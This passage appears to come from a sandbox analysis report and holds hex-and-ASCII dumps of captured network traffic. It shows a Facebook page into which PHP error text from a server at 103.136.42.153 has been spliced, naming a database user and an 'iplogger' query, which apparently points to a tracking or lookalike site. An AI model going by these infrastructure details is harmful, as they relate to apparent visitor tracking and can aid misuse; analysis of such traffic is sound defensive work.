ed\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\
2022-10-07 13:59:25 UTC	648	IN	Data Raw: 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 Data Ascii: 0253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogg
2022-10-07 13:59:25 UTC	649	IN	Data Raw: 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 Data Ascii: 3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A
2022-10-07 13:59:25 UTC	651	IN	Data Raw: 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 Data Ascii: 0253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/s
2022-10-07 13:59:25 UTC	652	IN	Data Raw: 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 Data Ascii: 53C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a
2022-10-07 13:59:25 UTC	654	IN	Data Raw: 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 Data Ascii: Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", &q
2022-10-07 13:59:25 UTC	655	IN	Data Raw: 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 20to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A
2022-10-07 13:59:25 UTC	657	IN	Data Raw: 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 Data Ascii: abase.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www
2022-10-07 13:59:25 UTC	658	IN	Data Raw: 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 Data Ascii: u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr
2022-10-07 13:59:25 UTC	660	IN	Data Raw: 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 0253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A
2022-10-07 13:59:25 UTC	661	IN	Data Raw: 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 Data Ascii: %3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%
2022-10-07 13:59:25 UTC	662	IN	Data Raw: 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 Data Ascii: 00%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u0025
2022-10-07 13:59:25 UTC	663	IN	Data Raw: 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f Data Ascii: u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520colo
2022-10-07 13:59:25 UTC	665	IN	Data Raw: 33 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 Data Ascii: 3A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E
2022-10-07 13:59:25 UTC	666	IN	Data Raw: 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 Data Ascii: l%253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageF
2022-10-07 13:59:25 UTC	667	IN	Data Raw: 56 67 5a 38 69 38 35 78 49 45 74 73 4f 33 63 44 33 6e 41 51 55 72 41 2d 35 7a 34 37 37 46 6d 38 77 63 72 48 64 69 33 52 49 5f 45 75 35 32 32 35 30 4e 47 68 57 33 55 6d 58 67 37 6c 30 4b 61 50 75 62 72 5a 55 41 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 68 6f 76 65 72 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 Data Ascii: VgZ8i85xIEtsO3cD3nAQUrA-5z477Fm8wcrHdi3RI_Eu52250NGhW3UmXg7l0KaPubrZUA" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="hover">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulle
2022-10-07 13:59:25 UTC	669	IN	Data Raw: 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 Data Ascii: and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about A
2022-10-07 13:59:25 UTC	670	IN	Data Raw: 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 71 48 51 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 6a 30 34 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 5a 79 73 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 36 54 30 22 7d 2c 22 32 35 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 47 4a 37 73 7a 6f 42 42 74 47 44 58 78 5a 4e 30 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 Data Ascii: ":"AT7B-2KeH1gOOVfLqHQ"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOAj04"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq4Zys"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZ6T0"},"2526":{"result":true,"hash":"AT4GJ7szoBBtGDXxZN0"},"819236":{"result
2022-10-07 13:59:25 UTC	672	IN	Data Raw: 52 59 6a 77 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 34 31 35 32 34 7d 2c 22 72 73 72 63 4d 61 70 22 3a 7b 22 6e 36 57 34 78 4d 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 4c 41 Data Ascii: RYjw"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006341524},"rsrcMap":{"n6W4xMH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yF\/l\/en_US\/BLA
2022-10-07 13:59:25 UTC	673	IN	Data Raw: 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6d 32 6c 32 6a 6c 4c 79 46 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 Data Ascii: .php\/v3\/yU\/r\/Jm2l2jlLyF6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"h3ZzAmG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v
